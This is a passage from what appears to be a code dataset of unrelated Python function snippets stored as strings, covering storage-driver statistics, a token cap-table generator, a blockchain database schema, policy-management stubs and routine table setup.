data['driver_version'] = self.VERSION\n data['storage_protocol'] = self.protocol\n\n asn = self.zfssa.get_asn()\n data['location_info'] = '%s:%s' % (asn, lcfg.zfssa_nfs_share)\n\n free, used = self._get_share_capacity_info()\n capacity = float(free) + float(used)\n ratio_used = used / capacity\n\n data['QoS_support'] = False\n data['reserved_percentage'] = 0\n\n used_percentage_limit = 100 - self.configuration.reserved_percentage\n used_ratio_limit = used_percentage_limit / 100.0\n if (ratio_used > used_ratio_limit or\n ratio_used >= self.configuration.max_over_subscription_ratio):\n data['reserved_percentage'] = 100\n\n data['total_capacity_gb'] = float(capacity) / units.Gi\n data['free_capacity_gb'] = float(free) / units.Gi\n\n share_details = self.zfssa.get_share(lcfg.zfssa_nfs_pool,\n lcfg.zfssa_nfs_project,\n lcfg.zfssa_nfs_share)\n pool_details = self.zfssa.get_pool_details(lcfg.zfssa_nfs_pool)\n\n data['zfssa_compression'] = share_details['compression']\n data['zfssa_encryption'] = share_details['encryption']\n data['zfssa_logbias'] = share_details['logbias']\n data['zfssa_poolprofile'] = pool_details['profile']\n data['zfssa_sparse'] = six.text_type(lcfg.nfs_sparsed_volumes)\n\n self._stats = data", "def test_create_hyperflex_ext_fc_storage_policy(self):\n pass", "def generate_cap_table(logger: Logger,\n dbsession: Session,\n token_address: str,\n order_by: str,\n order_direction: str,\n identity_provider: IdentityProvider,\n include_empty: bool,\n TokenScanStatus: type,\n TokenHolderAccount: type,\n no_name=\"<Unknown>\") -> CapTableInfo:\n\n status = dbsession.query(TokenScanStatus).filter_by(address=token_address).one_or_none() # type: TokenScanStatus\n if not status or status.end_block is None:\n raise NeedsTokenScan(\n \"No token {} balances available in the local database. Please run tokfetch token-scan first.\".format(\n token_address))\n\n q = status.get_accounts(include_empty)\n\n results = []\n total_balance = Decimal(0)\n last_token_transfer_at = datetime.datetime(1970, 1, 1, tzinfo=datetime.timezone.utc)\n for holder in q:\n\n id_check = identity_provider.get_identity(holder.address)\n if id_check:\n name = id_check.name\n else:\n name = no_name\n\n decimal_balance = holder.get_decimal_balance()\n\n entry = CapTableEntry(name, holder.address, decimal_balance, holder.last_block_updated_at)\n\n if entry.updated_at > last_token_transfer_at:\n last_token_transfer_at = entry.updated_at\n results.append(entry)\n\n if decimal_balance > 0: # Ignore cases where we cannot detect mint transaction\n total_balance += decimal_balance\n\n sort_entries(results, order_by, order_direction)\n\n # Retrofit decimal balances after we know the total sum\n if total_balance > 0:\n for r in results:\n r.percent = r.balance / total_balance\n\n info = CapTableInfo(status, last_token_transfer_at, total_balance, results)\n\n return info", "def pre_network_policy_create(self, resource_dict):\n pass", "def test_cap_table_formats(logger, dbsession, network, scanned_distribution, web3):\n\n identity_provider = NullIdentityProvider()\n\n token_address = scanned_distribution\n for sort_direction in [\"asc\", \"desc\"]:\n for sort_order in [\"address\", \"name\", \"balance\", \"updated\"]:\n generate_cap_table(\n logger,\n dbsession,\n token_address,\n order_by=sort_order,\n identity_provider=identity_provider,\n order_direction=sort_direction,\n include_empty=False,\n TokenScanStatus=TokenScanStatus,\n TokenHolderAccount=TokenHolderAccount,\n )", "def build_metadata():\n metadata = sa.MetaData()\n\n sa.Table(\n 'hive_blocks', metadata,\n sa.Column('num', sa.Integer, primary_key=True, autoincrement=False),\n sa.Column('hash', CHAR(40), nullable=False),\n sa.Column('prev', CHAR(40)),\n sa.Column('txs', SMALLINT, server_default='0', nullable=False),\n sa.Column('ops', SMALLINT, server_default='0', nullable=False),\n sa.Column('created_at', sa.DateTime, nullable=False),\n\n sa.UniqueConstraint('hash', name='hive_blocks_ux1'),\n sa.ForeignKeyConstraint(['prev'], ['hive_blocks.hash'], name='hive_blocks_fk1'),\n )\n\n sa.Table(\n 'hive_accounts', metadata,\n sa.Column('id', sa.Integer, primary_key=True),\n sa.Column('name', VARCHAR(16), nullable=False),\n sa.Column('created_at', sa.DateTime, nullable=False),\n #sa.Column('block_num', sa.Integer, nullable=False),\n sa.Column('reputation', sa.Float(precision=6), nullable=False, server_default='25'),\n\n sa.Column('display_name', sa.String(20)),\n sa.Column('about', sa.String(160)),\n sa.Column('location', sa.String(30)),\n sa.Column('website', sa.String(100)),\n sa.Column('profile_image', sa.String(1024), nullable=False, server_default=''),\n sa.Column('cover_image', sa.String(1024), nullable=False, server_default=''),\n\n sa.Column('followers', sa.Integer, nullable=False, server_default='0'),\n sa.Column('following', sa.Integer, nullable=False, server_default='0'),\n\n sa.Column('proxy', VARCHAR(16), nullable=False, server_default=''),\n sa.Column('post_count', sa.Integer, nullable=False, server_default='0'),\n sa.Column('proxy_weight', sa.Float(precision=6), nullable=False, server_default='0'),\n sa.Column('vote_weight', sa.Float(precision=6), nullable=False, server_default='0'),\n sa.Column('kb_used', sa.Integer, nullable=False, server_default='0'), # deprecated\n sa.Column('rank', sa.Integer, nullable=False, server_default='0'),\n\n sa.Column('lastread_at', sa.DateTime, nullable=False, server_default='1970-01-01 00:00:00'),\n sa.Column('active_at', sa.DateTime, nullable=False, server_default='1970-01-01 00:00:00'),\n sa.Column('cached_at', sa.DateTime, nullable=False, server_default='1970-01-01 00:00:00'),\n sa.Column('raw_json', sa.Text),\n\n\n sa.UniqueConstraint('name', name='hive_accounts_ux1'),\n sa.Index('hive_accounts_ix1', 'vote_weight', 'id'), # core: quick ranks\n sa.Index('hive_accounts_ix2', 'name', 'id'), # core: quick id map\n sa.Index('hive_accounts_ix3', 'vote_weight', 'name', postgresql_ops=dict(name='varchar_pattern_ops')), # API: lookup\n sa.Index('hive_accounts_ix4', 'id', 'name'), # API: quick filter/sort\n sa.Index('hive_accounts_ix5', 'cached_at', 'name'), # core/listen sweep\n )\n\n sa.Table(\n 'hive_posts', metadata,\n sa.Column('id', sa.Integer, primary_key=True),\n sa.Column('parent_id', sa.Integer),\n sa.Column('author', VARCHAR(16), nullable=False),\n sa.Column('permlink', VARCHAR(255), nullable=False),\n sa.Column('category', VARCHAR(255), nullable=False, server_default=''),\n sa.Column('community_id', sa.Integer, nullable=True),\n sa.Column('created_at', sa.DateTime, nullable=False),\n sa.Column('depth', SMALLINT, nullable=False),\n sa.Column('is_deleted', BOOLEAN, nullable=False, server_default='0'),\n sa.Column('is_pinned', BOOLEAN, nullable=False, server_default='0'),\n sa.Column('is_muted', BOOLEAN, nullable=False, server_default='0'),\n sa.Column('is_valid', BOOLEAN, nullable=False, server_default='1'),\n sa.Column('promoted', sa.types.DECIMAL(10, 3), nullable=False, server_default='0'),\n\n sa.ForeignKeyConstraint(['author'], ['hive_accounts.name'], name='hive_posts_fk1'),\n sa.ForeignKeyConstraint(['parent_id'], ['hive_posts.id'], name='hive_posts_fk3'),\n sa.UniqueConstraint('author', 'permlink', name='hive_posts_ux1'),\n sa.Index('hive_posts_ix3', 'author', 'depth', 'id', postgresql_where=sql_text(\"is_deleted = '0'\")), # API: author blog/comments\n sa.Index('hive_posts_ix4', 'parent_id', 'id', postgresql_where=sql_text(\"is_deleted = '0'\")), # API: fetching children\n sa.Index('hive_posts_ix5', 'id', postgresql_where=sql_text(\"is_pinned = '1' AND is_deleted = '0'\")), # API: pinned post status\n sa.Index('hive_posts_ix6', 'community_id', 'id', postgresql_where=sql_text(\"community_id IS NOT NULL AND is_pinned = '1' AND is_deleted = '0'\")), # API: community pinned\n )\n\n sa.Table(\n 'hive_post_tags', metadata,\n sa.Column('post_id', sa.Integer, nullable=False),\n sa.Column('tag', sa.String(32), nullable=False),\n sa.UniqueConstraint('tag', 'post_id', name='hive_post_tags_ux1'), # core\n sa.Index('hive_post_tags_ix1', 'post_id'), # core\n )\n\n sa.Table(\n 'hive_follows', metadata,\n sa.Column('follower', sa.Integer, nullable=False),\n sa.Column('following', sa.Integer, nullable=False),\n sa.Column('state', SMALLINT, nullable=False, server_default='1'),\n sa.Column('created_at', sa.DateTime, nullable=False),\n\n sa.UniqueConstraint('following', 'follower', name='hive_follows_ux3'), # core\n sa.Index('hive_follows_ix5a', 'following', 'state', 'created_at', 'follower'),\n sa.Index('hive_follows_ix5b', 'follower', 'state', 'created_at', 'following'),\n )\n\n sa.Table(\n 'hive_reblogs', metadata,\n sa.Column('account', VARCHAR(16), nullable=False),\n sa.Column('post_id', sa.Integer, nullable=False),\n sa.Column('created_at', sa.DateTime, nullable=False),\n\n sa.ForeignKeyConstraint(['account'], ['hive_accounts.name'], name='hive_reblogs_fk1'),\n sa.ForeignKeyConstraint(['post_id'], ['hive_posts.id'], name='hive_reblogs_fk2'),\n sa.UniqueConstraint('account', 'post_id', name='hive_reblogs_ux1'), # core\n sa.Index('hive_reblogs_ix1', 'post_id', 'account', 'created_at'), # API -- not yet used\n )\n\n sa.Table(\n 'hive_payments', metadata,\n sa.Column('id', sa.Integer, primary_key=True),\n sa.Column('block_num', sa.Integer, nullable=False),\n sa.Column('tx_idx', SMALLINT, nullable=False),\n sa.Column('post_id', sa.Integer, nullable=False),\n sa.Column('from_account', sa.Integer, nullable=False),\n sa.Column('to_account', sa.Integer, nullable=False),\n sa.Column('amount', sa.types.DECIMAL(10, 3), nullable=False),\n sa.Column('token', VARCHAR(5), nullable=False),\n\n sa.ForeignKeyConstraint(['from_account'], ['hive_accounts.id'], name='hive_payments_fk1'),\n sa.ForeignKeyConstraint(['to_account'], ['hive_accounts.id'], name='hive_payments_fk2'),\n sa.ForeignKeyConstraint(['post_id'], ['hive_posts.id'], name='hive_payments_fk3'),\n )\n\n sa.Table(\n 'hive_feed_cache', metadata,\n sa.Column('post_id', sa.Integer, nullable=False),\n sa.Column('account_id', sa.Integer, nullable=False),\n sa.Column('created_at', sa.DateTime, nullable=False),\n sa.UniqueConstraint('post_id', 'account_id', name='hive_feed_cache_ux1'), # core\n sa.Index('hive_feed_cache_ix1', 'account_id', 'post_id', 'created_at'), # API (and rebuild?)\n )\n\n sa.Table(\n 'hive_posts_cache', metadata,\n sa.Column('post_id', sa.Integer, primary_key=True, autoincrement=False),\n sa.Column('author', VARCHAR(16), nullable=False),\n sa.Column('permlink', VARCHAR(255), nullable=False),\n sa.Column('category', VARCHAR(255), nullable=False, server_default=''),\n\n # important/index\n sa.Column('community_id', sa.Integer, nullable=True),\n sa.Column('depth', SMALLINT, nullable=False, server_default='0'),\n sa.Column('children', SMALLINT, nullable=False, server_default='0'),\n\n # basic/extended-stats\n sa.Column('author_rep', sa.Float(precision=6), nullable=False, server_default='0'),\n sa.Column('flag_weight', sa.Float(precision=6), nullable=False, server_default='0'),\n sa.Column('total_votes', sa.Integer, nullable=False, server_default='0'),\n sa.Column('up_votes', sa.Integer, nullable=False, server_default='0'),\n\n # basic ui fields\n sa.Column('title', sa.String(255), nullable=False, server_default=''),\n sa.Column('preview', sa.String(1024), nullable=False, server_default=''),\n sa.Column('img_url', sa.String(1024), nullable=False, server_default=''),\n\n # core stats/indexes\n sa.Column('payout', sa.types.DECIMAL(10, 3), nullable=False, server_default='0'),\n sa.Column('promoted', sa.types.DECIMAL(10, 3), nullable=False, server_default='0'),\n sa.Column('created_at', sa.DateTime, nullable=False, server_default='1990-01-01'),\n sa.Column('payout_at', sa.DateTime, nullable=False, server_default='1990-01-01'),\n sa.Column('updated_at', sa.DateTime, nullable=False, server_default='1990-01-01'),\n sa.Column('is_paidout', BOOLEAN, nullable=False, server_default='0'),\n\n # ui flags/filters\n sa.Column('is_nsfw', BOOLEAN, nullable=False, server_default='0'),\n sa.Column('is_declined', BOOLEAN, nullable=False, server_default='0'),\n sa.Column('is_full_power', BOOLEAN, nullable=False, server_default='0'),\n sa.Column('is_hidden', BOOLEAN, nullable=False, server_default='0'),\n sa.Column('is_grayed', BOOLEAN, nullable=False, server_default='0'),\n\n # important indexes\n sa.Column('rshares', sa.BigInteger, nullable=False, server_default='0'),\n sa.Column('sc_trend', sa.Float(precision=6), nullable=False, server_default='0'),\n sa.Column('sc_hot', sa.Float(precision=6), nullable=False, server_default='0'),\n\n # bulk data\n sa.Column('body', TEXT),\n sa.Column('votes', TEXT),\n sa.Column('json', sa.Text),\n sa.Column('raw_json', sa.Text),\n\n # index: misc\n sa.Index('hive_posts_cache_ix3', 'payout_at', 'post_id', postgresql_where=sql_text(\"is_paidout = '0'\")), # core: payout sweep\n sa.Index('hive_posts_cache_ix8', 'category', 'payout', 'depth', postgresql_where=sql_text(\"is_paidout = '0'\")), # API: tag stats\n\n # index: ranked posts\n sa.Index('hive_posts_cache_ix2', 'promoted', postgresql_where=sql_text(\"is_paidout = '0' AND promoted > 0\")), # API: promoted\n\n sa.Index('hive_posts_cache_ix6a', 'sc_trend', 'post_id', postgresql_where=sql_text(\"is_paidout = '0'\")), # API: trending todo: depth=0\n sa.Index('hive_posts_cache_ix7a', 'sc_hot', 'post_id', postgresql_where=sql_text(\"is_paidout = '0'\")), # API: hot todo: depth=0\n sa.Index('hive_posts_cache_ix6b', 'post_id', 'sc_trend', postgresql_where=sql_text(\"is_paidout = '0'\")), # API: trending, filtered todo: depth=0\n sa.Index('hive_posts_cache_ix7b', 'post_id', 'sc_hot', postgresql_where=sql_text(\"is_paidout = '0'\")), # API: hot, filtered todo: depth=0\n\n sa.Index('hive_posts_cache_ix9a', 'depth', 'payout', 'post_id', postgresql_where=sql_text(\"is_paidout = '0'\")), # API: payout todo: rem depth\n sa.Index('hive_posts_cache_ix9b', 'category', 'depth', 'payout', 'post_id', postgresql_where=sql_text(\"is_paidout = '0'\")), # API: payout, filtered todo: rem depth\n\n sa.Index('hive_posts_cache_ix10', 'post_id', 'payout', postgresql_where=sql_text(\"is_grayed = '1' AND payout > 0\")), # API: muted, by filter/date/payout\n\n # index: stats\n sa.Index('hive_posts_cache_ix20', 'community_id', 'author', 'payout', 'post_id', postgresql_where=sql_text(\"is_paidout = '0'\")), # API: pending distribution; author payout\n\n # index: community ranked posts\n sa.Index('hive_posts_cache_ix30', 'community_id', 'sc_trend', 'post_id', postgresql_where=sql_text(\"community_id IS NOT NULL AND is_grayed = '0' AND depth = 0\")), # API: community trend\n sa.Index('hive_posts_cache_ix31', 'community_id', 'sc_hot', 'post_id', postgresql_where=sql_text(\"community_id IS NOT NULL AND is_grayed = '0' AND depth = 0\")), # API: community hot\n sa.Index('hive_posts_cache_ix32', 'community_id', 'created_at', 'post_id', postgresql_where=sql_text(\"community_id IS NOT NULL AND is_grayed = '0' AND depth = 0\")), # API: community created\n sa.Index('hive_posts_cache_ix33', 'community_id', 'payout', 'post_id', postgresql_where=sql_text(\"community_id IS NOT NULL AND is_grayed = '0' AND is_paidout = '0'\")), # API: community payout\n sa.Index('hive_posts_cache_ix34', 'community_id', 'payout', 'post_id', postgresql_where=sql_text(\"community_id IS NOT NULL AND is_grayed = '1' AND is_paidout = '0'\")), # API: community muted\n )\n\n sa.Table(\n 'hive_state', metadata,\n sa.Column('block_num', sa.Integer, primary_key=True, autoincrement=False),\n sa.Column('db_version', sa.Integer, nullable=False),\n sa.Column('steem_per_mvest', sa.types.DECIMAL(8, 3), nullable=False),\n sa.Column('usd_per_steem', sa.types.DECIMAL(8, 3), nullable=False),\n sa.Column('sbd_per_steem', sa.types.DECIMAL(8, 3), nullable=False),\n sa.Column('dgpo', sa.Text, nullable=False),\n )\n\n metadata = build_metadata_community(metadata)\n\n metadata = build_metadata_blacklist(metadata)\n\n metadata = build_trxid_block_num(metadata)\n\n return metadata", "def load_status_table():", "def _update_suspicion_0(self):\n\n for bucket in self.used_buckets:\n multiplier = 1 if bucket.attacked else 0\n for user in bucket.users:\n user.suspicion += (1 / len(bucket)) * multiplier", "def _populate_table_status():\n [db_insert_or_get(Status, name=name) for name in app.config['STATUS_DICT'][1:]]\n db.session.commit()", "def _update_suspicion_0(self):\n\n for bucket in self.buckets:\n multiplier = 1 if bucket.attacked else 0\n for user in bucket.users:\n user.suspicion += (1 / len(bucket)) * multiplier", "def _create_intermediate_old_tables_structure(self, conn):\n table_names = []\n with conn.cursor() as cursor, CodeProfiler() as cp:\n tblname = self._blacklist_old_tblname\n cursor.execute(sql.SQL(\"\"\"CREATE UNLOGGED TABLE {0} (\n imei_norm TEXT NOT NULL,\n virt_imei_shard SMALLINT NOT NULL,\n block_date DATE NOT NULL,\n reasons TEXT[] NOT NULL\n ) PARTITION BY RANGE (virt_imei_shard)\n \"\"\").format(sql.Identifier(tblname)))\n partition_utils.create_imei_shard_partitions(conn, tbl_name=tblname, unlogged=True)\n table_names.append(tblname)\n\n tblname = self._notifications_lists_old_tblname\n cursor.execute(sql.SQL(\"\"\"CREATE UNLOGGED TABLE {0} (\n operator_id TEXT NOT NULL,\n imei_norm TEXT NOT NULL,\n virt_imei_shard SMALLINT NOT NULL,\n imsi TEXT NOT NULL,\n msisdn TEXT NOT NULL,\n block_date DATE NOT NULL,\n reasons TEXT[] NOT NULL,\n amnesty_granted BOOLEAN\n ) PARTITION BY LIST (operator_id)\n \"\"\").format(sql.Identifier(tblname)))\n table_names.append(tblname)\n self._create_operator_partitions(conn,\n parent_tbl_name=tblname,\n child_name_fn=self._notifications_lists_old_part_tblname,\n is_unlogged=True)\n\n tblname = self._exceptions_lists_old_tblname\n cursor.execute(sql.SQL(\"\"\"CREATE UNLOGGED TABLE {0} (\n operator_id TEXT NOT NULL,\n imei_norm TEXT NOT NULL,\n virt_imei_shard SMALLINT NOT NULL,\n imsi TEXT NOT NULL\n ) PARTITION BY LIST (operator_id)\n \"\"\").format(sql.Identifier(tblname)))\n table_names.append(tblname)\n self._create_operator_partitions(conn,\n parent_tbl_name=tblname,\n child_name_fn=self._exceptions_lists_old_part_tblname,\n is_unlogged=True)\n\n self._intermediate_table_names.extend(table_names)\n return -1, cp.duration", "def get_total_stateless(db):\n pass", "def create_statistics(self):\n now = datetime.now()\n min_timestamp = Statistic.objects.all().aggregate(Max('timestamp_end'))[\"timestamp_end__max\"]\n max_timestamp = (now + ((datetime.min - now) % timedelta(minutes=60)) - timedelta(minutes=60)).replace(tzinfo=pytz.UTC)\n\n if min_timestamp is None:\n min_timestamp = datetime(2000, 1, 1, tzinfo=timezone('UTC'))\n\n aggregated_measurements = MeasurementService.get_aggregate_measurements(min_timestamp,max_timestamp)\n StatisticService.create_statistics(aggregated_measurements)", "def create_tradeoff_history(number_of_turns, policies):\n tradeoff_history = dict()\n for policy in policies:\n tradeoff_history[policy]=[False]*number_of_turns\n return tradeoff_history", "def store(self, context):\n values = {\n 'enabled': self.enabled,\n 'data': self.data,\n 'last_op': self.last_op,\n 'priority': self.priority\n }\n\n if self.id:\n cpo.ClusterPolicy.update(context, self.cluster_id, self.policy_id,\n values)\n else:\n binding = cpo.ClusterPolicy.create(context, self.cluster_id,\n self.policy_id, values)\n self.cluster_name = binding.cluster.name\n self.policy_name = binding.policy.name\n self.policy_type = binding.policy.type\n self.id = binding.id\n\n return self.id", "def policy(self) -> typing.Optional[\"BucketPolicy\"]:\n ...", "def test_patch_hyperflex_cluster_storage_policy(self):\n pass", "def __init__(self, policy: TypePolicy, byte_size: int, flags: int, bin: TypeBinName): \n self._children= (\n byte_size,\n _GenericExpr(_ExprOp._AS_EXP_BIT_FLAGS, 0, {_Keys.VALUE_KEY: policy['bit_write_flags']} if policy is not None and 'bit_write_flags' in policy else {_Keys.VALUE_KEY: 0}),\n _GenericExpr(_ExprOp._AS_EXP_BIT_FLAGS, 0, {_Keys.VALUE_KEY: flags} if flags is not None else {_Keys.VALUE_KEY: 0}),\n bin if isinstance(bin, _BaseExpr) else BlobBin(bin)\n )", "def test_get_hyperflex_cluster_storage_policy_list(self):\n pass", "def adapter_policy_create(handle, name, descr=\"\", parent_dn=\"org-root\"):\n\n from ucsmsdk.mometa.adaptor.AdaptorHostEthIfProfile import \\\n AdaptorHostEthIfProfile\n\n obj = handle.query_dn(parent_dn)\n if not obj:\n raise ValueError(\"org '%s' does not exist\" % parent_dn)\n\n mo = AdaptorHostEthIfProfile(parent_mo_or_dn=obj, name=name, descr=descr)\n handle.add_mo(mo, modify_present=True)\n handle.commit()\n return mo", "def setting(self):\n conn = sqlite3.connect(self.filename)\n logging.info(\"Opened database successfully\")\n try:\n conn.execute('''DROP TABLE IF EXISTS PRECIPITATION;''')\n conn.execute('''CREATE TABLE PRECIPITATION (\n Xref INTEGER,\n Yref INTEGER,\n Date TEXT,\n Value INTEGER\n );'''\n )\n self.count('before')\n except:\n pass\n conn.close()", "def _convert_policy_to_index(self, req):\n policy_name = req.headers.get('X-Storage-Policy')\n if not policy_name:\n return\n policy = POLICIES.get_by_name(policy_name)\n if not policy:\n raise HTTPBadRequest(request=req,\n content_type=\"text/plain\",\n body=(\"Invalid %s '%s'\"\n % ('X-Storage-Policy', policy_name)))\n if policy.is_deprecated:\n body = 'Storage Policy %r is deprecated' % (policy.name)\n raise HTTPBadRequest(request=req, body=body)\n return int(policy)", "def test_list_cluster_policy(self):\n pass", "def test_create_cluster_policy_binding(self):\n pass", "def cleanup_policy_create(ctx: click.Context, **kwargs):\n # TODO: use a click type for this check?\n criteria_keys = {'downloaded', 'updated', 'regex'}\n util.move_to_key(kwargs, 'criteria', criteria_keys)\n\n util.rename_keys(kwargs['criteria'], {\n 'downloaded': 'lastDownloaded',\n 'updated': 'lastBlobUpdated',\n })\n\n subcommand_cleanup_policy.cmd_create(ctx.obj, **kwargs)", "def create_UAG_table_in_sql(sql_cursor):\n sql_cursor.execute('''DROP TABLE IF EXISTS uag_complete;''')\n sql_cursor.execute(\n '''CREATE TABLE uag_complete (\n _id integer PRIMARY KEY, \n user_id varchar(50),\n age_bucket varchar(20),\n age_avg varchar(20),\n gender_bucket varchar(20),\n source varchar(30));\n ''')", "def policy(agent):", "def setup_table(self):\n self.interface.start_transaction()\n self.interface.drop_table(_history_table)\n self.interface.drop_table(_history_stats_table)\n self.interface.create_table(_history_table)\n self.interface.create_index('index1', _history_table, [_history_table['timestamp']])\n self.interface.create_table(_history_stats_table)\n self.interface.create_index('index2', _history_stats_table, [_history_stats_table['benchmark']])\n self.interface.commit_transaction()", "def update_policy(self):\n self.trainer_metrics.start_policy_update_timer(\n number_experiences=len(self.training_buffer.update_buffer[\"actions\"]),\n mean_return=float(np.mean(self.cumulative_returns_since_policy_update)),\n )\n self.cumulative_returns_since_policy_update = []\n n_sequences = max(\n int(self.trainer_parameters[\"batch_size\"] / self.policy.sequence_length), 1\n )\n value_total, policy_total = [], []\n advantages = self.training_buffer.update_buffer[\"advantages\"].get_batch()\n self.training_buffer.update_buffer[\"advantages\"].set(\n (advantages - advantages.mean()) / (advantages.std() + 1e-10)\n )\n num_epoch = self.trainer_parameters[\"num_epoch\"]\n for _ in range(num_epoch):\n self.training_buffer.update_buffer.shuffle()\n buffer = self.training_buffer.update_buffer\n for l in range(\n len(self.training_buffer.update_buffer[\"actions\"]) // n_sequences\n ):\n start = l * n_sequences\n end = (l + 1) * n_sequences\n run_out = self.policy.update(\n buffer.make_mini_batch(start, end), n_sequences\n )\n value_total.append(run_out[\"value_loss\"])\n policy_total.append(np.abs(run_out[\"policy_loss\"]))\n self.stats[\"Losses/Value Loss\"].append(np.mean(value_total))\n self.stats[\"Losses/Policy Loss\"].append(np.mean(policy_total))\n for _, reward_signal in self.policy.reward_signals.items():\n update_stats = reward_signal.update(\n self.training_buffer.update_buffer, n_sequences\n )\n for stat, val in update_stats.items():\n self.stats[stat].append(val)\n if self.policy.bc_module:\n update_stats = self.policy.bc_module.update()\n for stat, val in update_stats.items():\n self.stats[stat].append(val)\n self.training_buffer.reset_update_buffer()\n self.trainer_metrics.end_policy_update()", "def new_capacity_rule(mod, prj, prd):\n return 0", "def baseline_statistics(self, **_):\n raise NotImplementedError(\"{} doesn't support statistics.\".format(__class__.__name__))", "def _update_suspicion_2(self):\n\n for bucket in self.buckets:\n multiplier = 1 if bucket.attacked else -1\n for user in bucket.users:\n user.suspicion += (1 / len(bucket)) * multiplier", "def add_policy(self, policy, epochs=None, starting_epoch=0, ending_epoch=1, frequency=1):\n\n if epochs is None:\n epochs = list(range(starting_epoch, ending_epoch, frequency))\n\n for epoch in epochs:\n if epoch not in self.policies:\n self.policies[epoch] = [policy]\n else:\n self.policies[epoch].append(policy)\n assert len(self.policies[epoch]) > 0\n \n self.sched_metadata[policy] = {'starting_epoch': starting_epoch,\n 'ending_epoch': ending_epoch,\n 'frequency': frequency}\n\n class_name = policy.__class__.__name__.split(\"Policy\")[0]\n \n if \"Remover\" in class_name:\n self.thinning = True\n self.thinning_epoch = epochs\n\n # In the following code, we save the maximum and minimum epochs withing all pruners.\n # This is designed for distingushing the \"pretrain\", \"ADMM pruning\" and \"retrain\" phase. \n # Toward this end, we are able to tune the initial learning rate in an automative way.\n if class_name in ['ADMM', \"Pruning\"]:\n self.prune_mechanism = True\n if 'max_epoch' in self.pruner_info:\n if ending_epoch > self.pruner_info['max_epoch']:\n self.pruner_info['max_epoch'] = ending_epoch\n else:\n self.pruner_info['max_epoch'] = ending_epoch\n \n if class_name == 'ADMM':\n self.admm_prune = True\n # Can not deal with seperate ADMM pruner.\n self.pruner_info[\"ADMM_epoch\"] = ending_epoch\n\n if 'min_epoch' in self.pruner_info:\n if starting_epoch < self.pruner_info['min_epoch']:\n self.pruner_info['min_epoch'] = starting_epoch\n else:\n self.pruner_info['min_epoch'] = starting_epoch", "def _update_suspicion_2(self):\n\n for bucket in self.used_buckets:\n multiplier = 1 if bucket.attacked else -1\n for user in bucket.users:\n user.suspicion += (1 / len(bucket)) * multiplier", "def policies(self, value):\n policies = {}\n for domain, obj in six.iteritems(value):\n if isinstance(obj, Policy):\n policies[domain] = obj\n else:\n policies[domain] = Policy(obj, self.policy_aliases)\n self._set_attr('policies', policies)", "def _store_query_percentiles_table(self):\n constraint_list = self._config.get_constraint_list(\n require_correct=True)\n categories = self._config.results_db.get_unique_query_values(\n simple_fields=[(t1s.DBF_TABLENAME, t1s.DBF_NUMRECORDS),\n (t1s.DBF_TABLENAME, t1s.DBF_RECORDSIZE),\n (t1s.DBP_TABLENAME, t1s.DBP_SELECTIONCOLS),\n (t1s.DBF_TABLENAME, t1s.DBF_CAT)],\n constraint_list=constraint_list)\n # create the percentiles table:\n caption = \"Number of Percentiles passing the $%s+%sx$ requirement\" % (\n str(self._config.a_req), str(self._config.b_req))\n percentiles_table = latex_classes.LatexTable(\n caption, \"perc_main\",\n [\"DBNR\", \"DBRS\", \"Select\", \"Query Type\", \"Num Passing $\\%$iles\"])\n # compute number of percentiles met for every query category:\n for (dbnr, dbrs, selection_cols, query_cat) in categories:\n inp = t1ai.Input()\n inp[t1s.DBF_CAT] = query_cat\n inp[t1s.DBF_NUMRECORDS] = dbnr\n inp[t1s.DBF_RECORDSIZE] = dbrs\n inp[t1s.DBP_SELECTIONCOLS] = selection_cols\n performer_constraint_list = self._config.get_constraint_list(\n usebaseline=False) + inp.get_constraint_list()\n baseline_constraint_list = self._config.get_constraint_list(\n usebaseline=True) + inp.get_constraint_list()\n percentile_getter = percentiles.Ta1PercentileGetter(\n self._config.results_db, performer_constraint_list,\n baseline_constraint_list)\n if percentile_getter.has_values():\n all_met = percentile_getter.get_all_met(\n self._config.a_req, self._config.b_req)\n percentiles_table.add_content([\n inp.test_db.get_db_num_records_str(),\n inp.test_db.get_db_record_size_str(), selection_cols,\n query_cat, len(all_met)])\n self._outp[\"query_percentiles_table\"] = percentiles_table.get_string()", "def _compute_hybridized_profile_components(self):\n\n for params in self.__rep_profile_hybridization_params:\n col, (hybrid_idxs, solar_idxs), fpath, p_name, dset_name = params\n capacity = self.hybrid_meta.loc[hybrid_idxs, col].values\n\n with Resource(fpath) as res:\n data = res[dset_name,\n res.time_index.isin(self.hybrid_time_index)]\n self._profiles[p_name][:, hybrid_idxs] = (data[:, solar_idxs]\n * capacity)", "def __init__(self):\n self.account = None\n self.typeInfo['account'] = 'string'\n \"\"\"the domain of the HealthCheck policy\"\"\"\n self.domain = None\n self.typeInfo['domain'] = 'string'\n \"\"\"the domain ID of the HealthCheck policy\"\"\"\n self.domainid = None\n self.typeInfo['domainid'] = 'string'\n \"\"\"the LB rule ID\"\"\"\n self.lbruleid = None\n self.typeInfo['lbruleid'] = 'string'\n \"\"\"the id of the zone the HealthCheck policy belongs to\"\"\"\n self.zoneid = None\n self.typeInfo['zoneid'] = 'string'\n \"\"\"the list of healthcheckpolicies\"\"\"\n self.healthcheckpolicy = []", "def create_vpc_if_policy_group(self, name, aep_name):\n policy_group_mo = AccBndlGrp('uni/infra/funcprof/', name, lagT='node')\n self.commit(policy_group_mo)\n # if attachable entity profile does not exists, creates a new one\n class_query = ClassQuery('infraAttEntityP')\n class_query.propFilter = 'eq(infraAttEntityP.name, \"' + AEP_PREFIX + aep_name + '\")'\n pd_list = self.moDir.query(class_query)\n if len(pd_list) == 0:\n vlan_pool_mo = self.create_vlan_pool(VLAN_POOL_PREFIX + aep_name, 'static')\n DomP_mo = self.create_physical_domain(PD_PREFIX + aep_name, str(vlan_pool_mo.dn))\n AttEntityP_mo = self.create_attachable_entity_profile(AEP_PREFIX + aep_name, str(DomP_mo.dn))\n else:\n AttEntityP_mo = pd_list[0]\n # Assign attached entity profile\n self.commit(\n RsAttEntP(policy_group_mo.dn, tDn=str(AttEntityP_mo.dn))\n )\n # Assign interface policies. For non-defaults, check if is already created. If not, the system will create them\n IfPolmo = self.moDir.lookupByDn('uni/infra/cdpIfP-CDP-ON')\n if not IfPolmo:\n IfPolmo = IfPol('uni/infra','CDP-ON',adminSt='enabled')\n self.commit(IfPolmo)\n self.commit(\n RsCdpIfPol(policy_group_mo.dn, tnCdpIfPolName=IfPolmo.name)\n )\n self.commit(\n RsHIfPol(policy_group_mo.dn, tnFabricHIfPolName='default')\n )\n self.commit(\n RsL2IfPol(policy_group_mo.dn, tnL2IfPolName='default')\n )\n LagPolmo = self.moDir.lookupByDn('uni/infra/lacplagp-LACP')\n if not LagPolmo:\n LagPolmo = 